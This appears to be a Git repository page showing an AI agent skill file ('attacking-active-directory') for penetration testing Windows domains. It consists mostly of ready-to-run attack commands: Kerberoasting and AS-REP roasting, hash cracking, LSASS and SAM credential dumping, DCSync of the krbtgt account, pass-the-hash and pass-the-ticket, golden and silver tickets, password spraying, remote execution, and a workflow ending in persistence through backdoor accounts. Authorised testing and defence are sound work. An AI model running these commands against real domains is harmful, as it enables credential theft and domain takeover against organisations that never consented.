zhongwei/gh-trilwu-secskills-secskills
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
gh-trilwu-secskills-secskills/skills/active-directory-attacks/SKILL.md
Zhongwei Li 33a29e697a Initial commit
2025-11-30 09:03:09 +08:00

7.8 KiB
Raw Permalink Blame History

name, description
name description
attacking-active-directory Attack and enumerate Active Directory environments using Kerberos attacks (Kerberoasting, ASREPRoasting), credential dumping (DCSync, Mimikatz), lateral movement (PtH, PtT), and BloodHound analysis. Use when pentesting Windows domains or exploiting AD misconfigurations.

Attacking Active Directory

When to Use

  • AD reconnaissance and enumeration
  • Kerberos-based attacks
  • Credential dumping from domain controllers
  • Lateral movement within domains
  • BloodHound attack path analysis
  • Domain persistence techniques

Kerberoasting

Windows:

# Check kerberoastable users
.\Rubeus.exe kerberoast /stats

# Roast all
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target specific user
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt

# Target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap

Linux:

# Impacket GetUserSPNs
GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user:password -outputfile hashes.txt

# With NT hash
GetUserSPNs.py -request -dc-ip 10.10.10.10 -hashes :ntlmhash domain.local/user -outputfile hashes.txt

# Target specific user
GetUserSPNs.py -request-user svc_mssql -dc-ip 10.10.10.10 domain.local/user:password

Crack Hashes:

# Hashcat (TGS-REP)
hashcat -m 13100 hashes.txt wordlist.txt

# John
john --wordlist=wordlist.txt hashes.txt

ASREPRoasting

Windows:

# Enumerate vulnerable users
Get-DomainUser -PreauthNotRequired

# Roast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
.\Rubeus.exe asreproast /user:victim /format:hashcat

Linux:

# With domain creds
GetNPUsers.py domain.local/user:password -request -format hashcat -outputfile hashes.txt

# Without creds (username list)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.10

Crack AS-REP:

hashcat -m 18200 hashes.txt wordlist.txt

BloodHound

Data Collection:

# Windows - SharpHound
.\SharpHound.exe -c All --zipfilename output.zip
.\SharpHound.exe -c All,GPOLocalGroup

Linux:

# bloodhound-python
bloodhound-python -u user -p password -ns 10.10.10.10 -d domain.local -c All --zip

Useful Queries:

# Shortest path to Domain Admins
MATCH p=shortestPath((n)-[*1..]->(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p

# Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u

# AS-REP Roastable
MATCH (u:User {dontreqpreauth:true}) RETURN u

# Unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

# DCSync rights
MATCH p=(n)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p

Credential Dumping

LSASS Dumping:

# Task Manager: Right-click lsass.exe -> Create dump file

# procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full

# Parse offline with mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

SAM Dumping:

# Save hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

# Extract hashes (Linux)
secretsdump.py -sam sam.hive -system system.hive LOCAL

DCSync (Domain):

# secretsdump - dump all
secretsdump.py domain.local/user:password@dc.domain.local -just-dc

# Specific user
secretsdump.py domain.local/user:password@dc.domain.local -just-dc-user krbtgt

# With NTLM hash
secretsdump.py -hashes :ntlmhash domain.local/user@dc.domain.local -just-dc

Pass-the-Hash

Windows:

# Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe

Linux:

# CrackMapExec
crackmapexec smb 10.10.10.10 -u administrator -H hash
crackmapexec smb 10.10.10.10 -u administrator -H hash -x whoami

# psexec
psexec.py -hashes :hash administrator@10.10.10.10

# wmiexec
wmiexec.py -hashes :hash administrator@10.10.10.10

# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -H hash

Pass-the-Ticket

Export Tickets:

# Mimikatz
sekurlsa::tickets /export

# Rubeus
.\Rubeus.exe dump /nowrap
.\Rubeus.exe monitor /interval:10

Import/Use Tickets:

# Mimikatz
kerberos::ptt ticket.kirbi

# Rubeus
.\Rubeus.exe ptt /ticket:base64ticket

# Verify
klist

Linux PtT:

# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache

# Set ticket
export KRB5CCNAME=ticket.ccache

# Use ticket
psexec.py -k -no-pass domain.local/administrator@dc.domain.local

Overpass-the-Hash

# Rubeus - request TGT with NTLM hash
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /rc4:hash /ptt

# With AES key (better OPSEC)
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /aes256:key /ptt

Golden/Silver Tickets

Golden Ticket (TGT):

# Requirements: krbtgt hash, Domain SID

# Mimikatz
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt

# Rubeus
.\Rubeus.exe golden /rc4:hash /user:administrator /domain:domain.local /sid:S-1-5-21-... /ptt

Silver Ticket (TGS):

# Requirements: Service account hash, Service SPN

# Mimikatz - CIFS service
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /target:dc.domain.local /service:cifs /rc4:hash /ptt

Lateral Movement

CrackMapExec:

# SMB spray
crackmapexec smb 10.10.10.0/24 -u user -p password

# Execute commands
crackmapexec smb 10.10.10.10 -u admin -p password -x whoami
crackmapexec smb 10.10.10.10 -u admin -H hash -x whoami

# Dump SAM
crackmapexec smb 10.10.10.10 -u admin -p password --sam

# Dump LSA
crackmapexec smb 10.10.10.10 -u admin -p password --lsa

PSExec Variants:

# psexec
psexec.py domain/user:password@10.10.10.10

# wmiexec (stealthier)
wmiexec.py domain/user:password@10.10.10.10

# smbexec (no service)
smbexec.py domain/user:password@10.10.10.10

WinRM:

# PowerShell
Enter-PSSession -ComputerName dc.domain.local -Credential domain\user

# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -p password
evil-winrm -i 10.10.10.10 -u administrator -H hash

Enumeration

Domain Info:

# PowerView
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainComputer
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"

Linux Enumeration:

# crackmapexec
crackmapexec smb 10.10.10.0/24 -u user -p password --users
crackmapexec smb 10.10.10.0/24 -u user -p password --groups

# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -D 'user@domain.local' -w 'password' -b "DC=domain,DC=local"

Quick Workflow

  1. Initial Access → Get domain credentials
  2. Enumeration → Run BloodHound collection
  3. Kerberoasting → Extract and crack service tickets
  4. Lateral Movement → Use creds to move to high-value targets
  5. Credential Dumping → Dump LSASS/SAM on compromised hosts
  6. DCSync → Extract all domain hashes from DC
  7. Persistence → Golden ticket or create backdoor accounts

Common Wins

  • Kerberoasting weak service account passwords
  • ASREPRoasting accounts without preauth
  • BloodHound finding short paths to DA
  • Pass-the-Hash from dumped credentials
  • DCSync with compromised accounts that have replication rights

Tools

  • Rubeus - Kerberos attacks (Windows)
  • Mimikatz - Credential dumping (Windows)
  • Impacket - Comprehensive toolkit (Linux)
  • BloodHound - AD relationship graphing
  • CrackMapExec - Swiss army knife for AD
  • PowerView - AD enumeration (PowerShell)
  • evil-winrm - WinRM access (Linux)

References

Reference in New Issue View Git Blame Copy Permalink